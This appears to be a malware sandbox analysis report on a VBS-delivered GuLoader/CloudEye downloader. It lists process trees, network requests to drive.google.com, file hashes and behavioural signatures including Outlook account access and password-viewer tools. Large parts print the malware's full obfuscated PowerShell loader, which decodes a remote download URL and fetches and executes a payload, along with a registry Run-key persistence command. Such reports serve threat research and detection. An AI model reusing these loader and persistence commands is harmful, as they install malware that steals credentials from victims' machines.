StomodpFilmspae Kontanrphytoplg BoundeeTrytophnPrevente tilflytmes iniiPastoricIndis.u,Haffler$KorrektoMiracidv Motorce sabrelrGeneraleUnbastel,anglrka N.melsbSodfarvo.ariosrrNoseaneaInviriltForsgs eKorriged Ser,ph).agsene ');Kend224 $Boominess;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Narco.Fla && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Kolinski" /t REG_EXPAND_SZ /d "%Siestas% -w 1 $Macrorhamphosidae=(Get-ItemProperty -Path 'HKCU:\Disputeredes\').Semimachine;%Siestas% ($Macrorhamphosidae)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Kolinski" /t REG_EXPAND_SZ /d "%Siestas% -w 1 $Macrorhamphosidae=(Get-ItemProperty -Path 'HKCU:\Disputeredes\').Semimachine;%Siestas% ($Macrorhamphosidae)"

Network

Country Destination Domain Proto
US 8.8.8.8:53 6777.6777.6777.677e udp
US 8.8.8.8:53 drive.google.com udp
GB 142.250.187.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.179.225:443 drive.usercontent.google.com tcp
GB 142.250.187.238:443 drive.google.com tcp
GB 142.250.179.225:443 drive.usercontent.google.com tcp

Files

memory/2620-4-0x000007FEF5D4E000-0x000007FEF5D4F000-memory.dmp

memory/2620-5-0x000000001B660000-0x000000001B942000-memory.dmp

memory/2620-6-0x0000000002860000-0x0000000002868000-memory.dmp

memory/2620-7-0x000007FEF5A90000-0x000007FEF642D000-memory.dmp

memory/2620-8-0x000007FEF5A90000-0x000007FEF642D000-memory.dmp

memory/2620-9-0x000007FEF5A90000-0x000007FEF642D000-memory.dmp

memory/2620-10-0x000007FEF5A90000-0x000007FEF642D000-memory.dmp

memory/2620-11-0x000007FEF5A90000-0x000007FEF642D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZCJV86C0MGD9C84TKO5P.temp

MD5 b1d21c5b38c9569fb27e16cc57feb3a0
SHA1 e4d83a2847bc9c7806f8f130f625d8bb695ab22f
SHA256 cdc82a6a7045c51ec2a7b323b5718d78ed83ca1e7698a6ad1d8e76f2e0a70329
SHA512 9c533c9487629ce3715a2cb6d419b801a798748994b82677ba23cad9fce23df52b49971827f702b53fbebf9b6a2802078593ca77c8f8c798722adfcce3cc79e2

C:\Users\Admin\AppData\Roaming\Narco.Fla

MD5 5b31fdcca43851229c6ad5c0d5124d9e
SHA1 95243324bfd6acd008518e233e5ac3a7a29e67a5
SHA256 c288a9c83ad9236a539faddaaa2d90d0beb42cc28c9b2f8009676ccd15b6b842
SHA512 e4446a71ba0ce278980fdb6d286b55adcc97dd5b5a3c36da978de06916846bcc05cdf6ce8adb4176693b1d896c8ddd5499e37ab3ab08e8bac7468495c84038f5

memory/2580-17-0x00000000066F0000-0x00000000093BB000-memory.dmp

memory/2620-18-0x000007FEF5A90000-0x000007FEF642D000-memory.dmp

memory/2620-19-0x000007FEF5D4E000-0x000007FEF5D4F000-memory.dmp

memory/2480-42-0x00000000004A0000-0x0000000001502000-memory.dmp

memory/2480-43-0x0000000001510000-0x00000000041DB000-memory.dmp

memory/2620-46-0x000007FEF5A90000-0x000007FEF642D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-21 15:29

Reported

2024-05-21 15:31

Platform

win10v2004-20240508-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Swift 2024052130819616.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Program Files (x86)\windows mail\wab.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Kolinski = "%Siestas% -w 1 $Macrorhamphosidae=(Get-ItemProperty -Path 'HKCU:\\Disputeredes\\').Semimachine;%Siestas% ($Macrorhamphosidae)" C:\Windows\SysWOW64\reg.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3424 wrote to memory of 2192 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 3424 wrote to memory of 2192 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2192 wrote to memory of 3264 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2192 wrote to memory of 3264 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 3424 wrote to memory of 4372 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3424 wrote to memory of 4372 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4372 wrote to memory of 836 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4372 wrote to memory of 836 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4372 wrote to memory of 1464 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4372 wrote to memory of 1464 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4372 wrote to memory of 1464 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1464 wrote to memory of 3824 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1464 wrote to memory of 3824 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1464 wrote to memory of 3824 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1464 wrote to memory of 996 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1464 wrote to memory of 996 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1464 wrote to memory of 996 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1464 wrote to memory of 996 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1464 wrote to memory of 996 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 996 wrote to memory of 4824 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 996 wrote to memory of 4824 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 996 wrote to memory of 4824 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 4824 wrote to memory of 3056 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4824 wrote to memory of 3056 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4824 wrote to memory of 3056 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 996 wrote to memory of 4732 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 996 wrote to memory of 4732 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 996 wrote to memory of 4732 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 996 wrote to memory of 4840 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 996 wrote to memory of 4840 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 996 wrote to memory of 4840 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 996 wrote to memory of 4840 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 996 wrote to memory of 2108 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 996 wrote to memory of 2108 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 996 wrote to memory of 2108 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 996 wrote to memory of 4660 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 996 wrote to memory of 4660 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 996 wrote to memory of 4660 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 996 wrote to memory of 4660 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 996 wrote to memory of 4012 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 996 wrote to memory of 4012 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 996 wrote to memory of 4012 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 996 wrote to memory of 4012 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Swift 2024052130819616.vbs"

C:\Windows\System32\cmd.exe

cmd.exe /c ping 6777.6777.6777.677e

C:\Windows\system32\PING.EXE

ping 6777.6777.6777.677e

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Skyldkreds = 1;$Ramplor='Sub';$Ramplor+='strin';$Ramplor+='g';Function Anspndelserne($Heri){$Antinuke=$Heri.Length-$Skyldkreds;For($Epiderm=7;$Epiderm -lt $Antinuke;$Epiderm+=8){$Picucule+=$Heri.$Ramplor.Invoke( $Epiderm, $Skyldkreds);}$Picucule;}function Kend224($Glassworking){. ($Truckful) ($Glassworking);}$Forkamrenes=Anspndelserne ' MonterMStranneoLunchlezPrutteriU.instrlWoodwo lOxysulpaMeet,yk/Nonha i5achymou.Specifi0Immana Saf,ful(FlertegWTriaziniProportnMegalogdAanderto FractuwKommunesL,vligh UnderfaNJa.ksniTBe,tyre Feased1rosillo0Svinge,..fledni0Lyst ac;Choktil Modsag WImpr,viiK ncelln B,otiy6 Supera4 Semida;Cent.al SarracxConurb,6Udlndin4Ud.igts;monimol RainisrKontorpvUnderbe: Gnomem1Tulipom2 Cyklin1Watte,s.A jecti0Dece,eb)Aabni,g Cresp,G ,emtoneTrsto fc,ananerkFnomen,oFolkemi/Pseudos2beclus 0Oversig1 Bromph0Svingka0Sternog1 Udstop0 Daabsv1Ergonom DukkefrFTryksvaiKeglensrTingsviePilsnerfNonimplobil.oquxHenimod/Dd.dags1Overris2 Hetero1Defekte. madaga0 Monsun ';$Veldreven=Anspndelserne ' Mis erUUltrabosde,emine OpblomrO.culat-p.racroAInterv g Po,tereHahnemanIndermatBullen ';$Cobstone=Anspndelserne ' MultichMatu attPressu tPl,isanpAlabastsEksk rs:Vestali/Dic lor/RevisordStoppegrAcromyoiSubji,ivNonprece Ho.eyw.Or rynugHomekeeo llustroImmeasugSkyllerlFagklaseBetnk,i. oernesc museneoAuktionmConvers/ForespruJudoe,lcDandlep? SmokepeInter exKnudepupFrgemanoDoktrinrFiligratGodsvog= SketchdBetalinoVagtselwTilskrenPetiverlMissy,eoClymeniaInappredSentime&PhilokliJungiand Stewpa=Galman,1ads.adiRVildbaslSpinineKAvourekASkammek_,iledamFVi,rensKRepr enSSten,ul5Cholehe0InterinwDihyd,iDStrabadLHornotiyKonstruh enkaldpIsocreo9Organog_Steno rgR.turvrYToilet 2Menusysa ch,fffsSol rredBombard8schchtn5PaleifoWHarvesa3sodioal9 photogA engtellStraahaMKommuni ';$Ulivssaar=Anspndelserne ' Hylac,>Retspri ';$Truckful=Anspndelserne 'PushtuaiSuperhueStenf.uxK ypsis ';$Bosjesman='Rigsdanske';$Formaalsbestemmelserne = Anspndelserne 'VagtskreKompasscVragr,sh Bjrneso Breaka Rettede% Ofringa Vedstap Vasicip ycophadU,recreaHusassitWhanginaskendes%F.rviss\NonpromNLepryafaKulturhr StrekacLichenio Corro .RomantiFGysninglThr.bbeaBilledv Jesuit&Mithers&Bragget G.untre Skiffec TyldishTvebakkoBegraen CaudilltSelvhjl ';Kend224 (Anspndelserne 'Progres$Slikkepg E,uadolProfitroTurbomobG idesmagennemll .using: VoksbnMCrudesmaAmtskomrSeerstoiPlethysn BrokeneWat.hmarKonditon P.antaeAfskummsOpkalds=Lgtning(randrusc nrepenmiodousnd Opp,es Patholy/ B njerc Skrald Deonera$WimplelFsta,ionoHorsemereso hagmBeregniaPrint.raR.vfisklJern etsForspanbRubaceseSnittebs Flowert MyotoneBeskinnm Udeholm errucaeFriarealRemil.ts Us rmteTranedarantini,nAttachhemaskine)Forg,en ');Kend224 (Anspndelserne 'Picture$ RavishgBath.melSavbladoFabeldyb D,casuaBurundilBarkinj: GarrisJDatarefeTelefoneCementeiSpewersnUn etrigCor ute=Slaabro$FrontinCAtaraxioGigololbZillio,sKrysantt TosidioAllerhjnAssoc ee Forure.Savneths ,rsenkpIsoplerlLiteraei Velarpt Sammen(Sl,ende$IcemanbUPlastrelPeris.aiFuturelvWimbleds No,thmsS.defteaBraefacaSrlingsrHast.rk) Bluffp ');$Cobstone=$Jeeing[0];$Optionsordning= (Anspndelserne 'Peerdom$IllumingTrikot.lMaleducoHy,ramnbNecrogra fis,ehlIslamit:ArseniuSProverbpU,licityOpgrelstEfter,ekSolersmrKhmererl LejlfrlAandsf esacri.tnTrasse,sSankask=EndorseN.teropeeDesdemowUdsprjt-,ocometO Gt,parbChri tijHyp ospe Ddebogcph lofet omfru OmitslaSSekundayRese,svsAger.netChapatieKirt,erm sprjte.SandaflNHeksekeeD,pletat,ardehv.TeknokrWfictitieHayseedb Pre,omCGlederelCharliniGrundgreDep.oran trillit');$Optionsordning+=$Marinernes[1];Kend224 ($Optionsordning);Kend224 (Anspndelserne 'Sek.ual$ Udhng.SVo,ingvp inegay OphjedtRegnskakMislighrMicroselChairm,lSvidnine rneopsn Foli bsBaymans.HolostoHPsych deHaematoaQuillajdSmutteteHelte or Fact.asF lende[ Tilsen$ orskniVFlleskre ,tokrolTorulacdSandblsrFjeldm.ewhorishvDarw niepawditenPamirim]kvalite=Ancho a$InterpuFsotols,ounderflr UruguakM elopaaUnap,alm ,pithermonicageProtubenStickupeGulvmopsPuddern ');$Frugtknivenes=Anspndelserne 'Stanchl$HalapepSLotu.blpny,alkuyNumbestt Kom.ank,olfangr TrapfalSopranel illogieAnglesmnBinocsgsUnwarra.InfluerDFis.endo PoachewCann.binp.ndoril PseudooMed,rbealev.rand.iscoloFBovspryiJuleevalBetrkkeeFakulte(Underst$SpillssCTipvognoE.issiobprovocas Unsu.ctTraw.ero Sti,fonUnvulgae Workfi,pibekon$SkyggetB Styrkelu.skrifo bicompdinfusedd PaparaoVe turanApologioHeadnotrSygdomseEtnologr Pr sopsUn vers)Rapacit ';$Bloddonorers=$Marinernes[0];Kend224 (Anspndelserne 'Obligat$TvrdraggBeevesplUrocentoLithatebUlideliaOutpushlInd,aae:,ttemasUEmpha.in.epatouf B.bestiErobr,nrN dsttemOfficern Pho eseUddeligsHitzco starveli=Piruett(ReturneT Recolle HanebjsHv,lepetEarlock-SatelliPMarasmoaForkludtlimn,phhach.lic .asagna$MortensBkatederlIn.stbeoS apsegdPlagiardQ,euerjo Promenn GeissooMotorbrr skabereKlatjedrHaemsses ostkor)Kra ile ');while (!$Unfirmness) {Kend224 (Anspndelserne 'Ban ing$ Non.ergTillidsl R.ngstoHu,mendbOvertimaBiofysilEpidias:DorerenTFrygtlorTangsp.aharc.lefHexadaci.udgetdkMerittem Schalmi S.ovlfnBenbevgiMetzuinsOldemodt FascikeTelpherrOsteope=Afbdend$formu.itEnegretrUnse,siuElegiaceFormidl ') ;Kend224 $Frugtknivenes;Kend224 (Anspndelserne ' ourishS SystemtSkrmforaKromskorGendannt Pinsel- MaanedSTortonilOmvltefeStereoreDe ikatp ekspon Whiglet4submers ');Kend224 (Anspndelserne 'Smaahan$ entalig WarfarlT,rmoploFlovesfbrdvigsea I dfinlLegepla: BirdliU unentanAna,ysefAm,hibiiStyrke.r Portatm IrrecenForderne toxicosUparti,sPrester=T,gntyp(Leas obTCompleteDu denosAnisos.tLav,ing-budgetoP imillaPy.oanttWeytymph Sogneg C.nsign$SkovvejBHunge.rl.catteroRedem,ndKonflikdTegnfoeoPrea.cinSejlgaro FarvetrAbitibieOutc,rerNonpondsIr dium)Forskni ') ;Kend224 (Anspndelserne 'Acropho$Oplreleg SkitselAlipteroCuritisbDiscomfa AdresslViseli,:Pi,fingCCirkulrhFremturrSkinmano Tar ntmUnhungri Absei.tHeat ene.pringnsHarmoni=Emissio$vestalmgSucces l Insur.oOph.halbAetomoraPistilllEskor.e:SpandgaSVagariokNullsniyProbatik Nonmatl IntellaSprr.ilpCompilepMaxierneGownanirDuelbet+Tredjed+Twifoil% Magnet$funktioJTankereeZeteticeDrfttyviAfh ldsn pre.cug rogger.D,collacAmarillo SnagesuuvenskanSkaerp,t Ch.yso ') ;$Cobstone=$Jeeing[$Chromites];}$Hypergenetic=335367;$overelaborated=30549;Kend224 (Anspndelserne 'Unallev$ anggldgHenequelAkslendob umairbUheldiga Ddsstrl Medlem:kemotergRnnebrgiSkelstenRekviemsSuper,lb,istrese BlanderAsterisg,opples Karambo=Opk app R derneGNecromae Fllesut Excell-FossernCDe astmoCaistaanPetticotKo erneeObdt,trnSkraatotscenasb Regiens$EmbedseB Undi fl Poker oEremitidLoculardBreatheoE iminen Aeronro EntrearKrydstoeGastermrPara ets Skovse ');Kend224 (Anspndelserne 'Snurret$ ThermigKalasetlPacesetoTranslab BaggagaGra slelMarinb.:FlushinLspunseniBob edesNonadvaaAntechan Fatteg6 Ju,edi7Holysto dentato=Lysshow Nierste[ KagemaSJowlbenyForesprsInd.andt,epravieMimsey,m Coying.Faub.urCAdlegiaoBindingn JazzorvNonillue Skatkar IndfartVerdens] chwei:Menne k:Ke,neldFSpec alrtenebr.ogrothitmIndstilB Neighba GeotersHerediteSil.igs6Quesc,y4ConvincSComprestDar eelrLsen leiequiponnPrintergOb tipa(Sprhjul$Py rhicgCeilingiHjer.efnStriatusU.scantbTewerheeIndvalgrcoriarigvo,mens)Disseas ');Kend224 (Anspndelserne ' Visitt$CavilsqgGavel,glSial.deoDa.delpbVi tigha Striktl Fjeder:DippercUBryds.mnsu erabaOrientaeHove,vasBifi.urtBacketchA preheeNyttigmt UndvigiPres.dec Trllea Braknin=Rdselsf Leotard[ indbanSadvokaty Dig,stsDestroytWaggonse G.ddeam Shad,w.overappT SeisemeS.ulledxApprecitUnjovia. Lipoc,EPu onslnRacewaycS,indeloAtebascdPrac,isi Digtenn nimalag Fremme]Unthrot:flleden: j rgonAfl ckleSupflowsCGo illaIShoolerIUnhateh.SidereaGSi.trygePylangitEffektfSDiscolotRet averHj rykfiVo panen SlandegKlasseh(Sko,dst$Ma.vrerLalgerieiDesinfis AtalanaTegnintn Rainwa6Ophirsn7Affects)Stavels ');Kend224 (Anspndelserne 'Unforma$Halliceg TappemlSt mpilo MaumetbLaanta aTrisoctlMeanies:BohvaerB WinnowoSha owho Skoledm RecarbiSekretinSiciliaeSealliksTailyeasnothosa=Folkesa$SkrmereUpibleden Stetsoa,inkkrteSvmmedys SchismtFrstediha.peteneIrreligtForv,rriaperturcM.talde.Zoblen,sColumnau,eminisbSindssvsRdbgenbt UnransrStvlungiKvalitenVgmalergWreathe(Damners$obstrukHLabio.ey StomodpFilmspae Kontanrphytoplg BoundeeTrytophnPrevente tilflytmes iniiPastoricIndis.u,Haffler$KorrektoMiracidv Motorce sabrelrGeneraleUnbastel,anglrka N.melsbSodfarvo.ariosrrNoseaneaInviriltForsgs eKorriged Ser,ph).agsene ');Kend224 $Boominess;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Narco.Fla && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skyldkreds = 1;$Ramplor='Sub';$Ramplor+='strin';$Ramplor+='g';Function Anspndelserne($Heri){$Antinuke=$Heri.Length-$Skyldkreds;For($Epiderm=7;$Epiderm -lt $Antinuke;$Epiderm+=8){$Picucule+=$Heri.$Ramplor.Invoke( $Epiderm, $Skyldkreds);}$Picucule;}function Kend224($Glassworking){. ($Truckful) ($Glassworking);}$Forkamrenes=Anspndelserne ' MonterMStranneoLunchlezPrutteriU.instrlWoodwo lOxysulpaMeet,yk/Nonha i5achymou.Specifi0Immana Saf,ful(FlertegWTriaziniProportnMegalogdAanderto FractuwKommunesL,vligh UnderfaNJa.ksniTBe,tyre Feased1rosillo0Svinge,..fledni0Lyst ac;Choktil Modsag WImpr,viiK ncelln B,otiy6 Supera4 Semida;Cent.al SarracxConurb,6Udlndin4Ud.igts;monimol RainisrKontorpvUnderbe: Gnomem1Tulipom2 Cyklin1Watte,s.A jecti0Dece,eb)Aabni,g Cresp,G ,emtoneTrsto fc,ananerkFnomen,oFolkemi/Pseudos2beclus 0Oversig1 Bromph0Svingka0Sternog1 Udstop0 Daabsv1Ergonom DukkefrFTryksvaiKeglensrTingsviePilsnerfNonimplobil.oquxHenimod/Dd.dags1Overris2 Hetero1Defekte. madaga0 Monsun ';$Veldreven=Anspndelserne ' Mis erUUltrabosde,emine OpblomrO.culat-p.racroAInterv g Po,tereHahnemanIndermatBullen ';$Cobstone=Anspndelserne ' MultichMatu attPressu tPl,isanpAlabastsEksk rs:Vestali/Dic lor/RevisordStoppegrAcromyoiSubji,ivNonprece Ho.eyw.Or rynugHomekeeo llustroImmeasugSkyllerlFagklaseBetnk,i. oernesc museneoAuktionmConvers/ForespruJudoe,lcDandlep? SmokepeInter exKnudepupFrgemanoDoktrinrFiligratGodsvog= SketchdBetalinoVagtselwTilskrenPetiverlMissy,eoClymeniaInappredSentime&PhilokliJungiand Stewpa=Galman,1ads.adiRVildbaslSpinineKAvourekASkammek_,iledamFVi,rensKRepr enSSten,ul5Cholehe0InterinwDihyd,iDStrabadLHornotiyKonstruh enkaldpIsocreo9Organog_Steno rgR.turvrYToilet 2Menusysa ch,fffsSol rredBombard8schchtn5PaleifoWHarvesa3sodioal9 photogA engtellStraahaMKommuni ';$Ulivssaar=Anspndelserne ' Hylac,>Retspri ';$Truckful=Anspndelserne 'PushtuaiSuperhueStenf.uxK ypsis ';$Bosjesman='Rigsdanske';$Formaalsbestemmelserne = Anspndelserne 'VagtskreKompasscVragr,sh Bjrneso Breaka Rettede% Ofringa Vedstap Vasicip ycophadU,recreaHusassitWhanginaskendes%F.rviss\NonpromNLepryafaKulturhr StrekacLichenio Corro .RomantiFGysninglThr.bbeaBilledv Jesuit&Mithers&Bragget G.untre Skiffec TyldishTvebakkoBegraen CaudilltSelvhjl ';Kend224 (Anspndelserne 'Progres$Slikkepg E,uadolProfitroTurbomobG idesmagennemll .using: VoksbnMCrudesmaAmtskomrSeerstoiPlethysn BrokeneWat.hmarKonditon P.antaeAfskummsOpkalds=Lgtning(randrusc nrepenmiodousnd Opp,es Patholy/ B njerc Skrald Deonera$WimplelFsta,ionoHorsemereso hagmBeregniaPrint.raR.vfisklJern etsForspanbRubaceseSnittebs Flowert MyotoneBeskinnm Udeholm errucaeFriarealRemil.ts Us rmteTranedarantini,nAttachhemaskine)Forg,en ');Kend224 (Anspndelserne 'Picture$ RavishgBath.melSavbladoFabeldyb D,casuaBurundilBarkinj: GarrisJDatarefeTelefoneCementeiSpewersnUn etrigCor ute=Slaabro$FrontinCAtaraxioGigololbZillio,sKrysantt TosidioAllerhjnAssoc ee Forure.Savneths ,rsenkpIsoplerlLiteraei Velarpt Sammen(Sl,ende$IcemanbUPlastrelPeris.aiFuturelvWimbleds No,thmsS.defteaBraefacaSrlingsrHast.rk) Bluffp ');$Cobstone=$Jeeing[0];$Optionsordning= (Anspndelserne 'Peerdom$IllumingTrikot.lMaleducoHy,ramnbNecrogra fis,ehlIslamit:ArseniuSProverbpU,licityOpgrelstEfter,ekSolersmrKhmererl LejlfrlAandsf esacri.tnTrasse,sSankask=EndorseN.teropeeDesdemowUdsprjt-,ocometO Gt,parbChri tijHyp ospe Ddebogcph lofet omfru OmitslaSSekundayRese,svsAger.netChapatieKirt,erm sprjte.SandaflNHeksekeeD,pletat,ardehv.TeknokrWfictitieHayseedb Pre,omCGlederelCharliniGrundgreDep.oran trillit');$Optionsordning+=$Marinernes[1];Kend224 ($Optionsordning);Kend224 (Anspndelserne 'Sek.ual$ Udhng.SVo,ingvp inegay OphjedtRegnskakMislighrMicroselChairm,lSvidnine rneopsn Foli bsBaymans.HolostoHPsych deHaematoaQuillajdSmutteteHelte or Fact.asF lende[ Tilsen$ orskniVFlleskre ,tokrolTorulacdSandblsrFjeldm.ewhorishvDarw niepawditenPamirim]kvalite=Ancho a$InterpuFsotols,ounderflr UruguakM elopaaUnap,alm ,pithermonicageProtubenStickupeGulvmopsPuddern ');$Frugtknivenes=Anspndelserne 'Stanchl$HalapepSLotu.blpny,alkuyNumbestt Kom.ank,olfangr TrapfalSopranel illogieAnglesmnBinocsgsUnwarra.InfluerDFis.endo PoachewCann.binp.ndoril PseudooMed,rbealev.rand.iscoloFBovspryiJuleevalBetrkkeeFakulte(Underst$SpillssCTipvognoE.issiobprovocas Unsu.ctTraw.ero Sti,fonUnvulgae Workfi,pibekon$SkyggetB Styrkelu.skrifo bicompdinfusedd PaparaoVe turanApologioHeadnotrSygdomseEtnologr Pr sopsUn vers)Rapacit ';$Bloddonorers=$Marinernes[0];Kend224 (Anspndelserne 'Obligat$TvrdraggBeevesplUrocentoLithatebUlideliaOutpushlInd,aae:,ttemasUEmpha.in.epatouf B.bestiErobr,nrN dsttemOfficern Pho eseUddeligsHitzco starveli=Piruett(ReturneT Recolle HanebjsHv,lepetEarlock-SatelliPMarasmoaForkludtlimn,phhach.lic .asagna$MortensBkatederlIn.stbeoS apsegdPlagiardQ,euerjo Promenn GeissooMotorbrr skabereKlatjedrHaemsses ostkor)Kra ile ');while (!$Unfirmness) {Kend224 (Anspndelserne 'Ban ing$ Non.ergTillidsl R.ngstoHu,mendbOvertimaBiofysilEpidias:DorerenTFrygtlorTangsp.aharc.lefHexadaci.udgetdkMerittem Schalmi S.ovlfnBenbevgiMetzuinsOldemodt FascikeTelpherrOsteope=Afbdend$formu.itEnegretrUnse,siuElegiaceFormidl ') ;Kend224 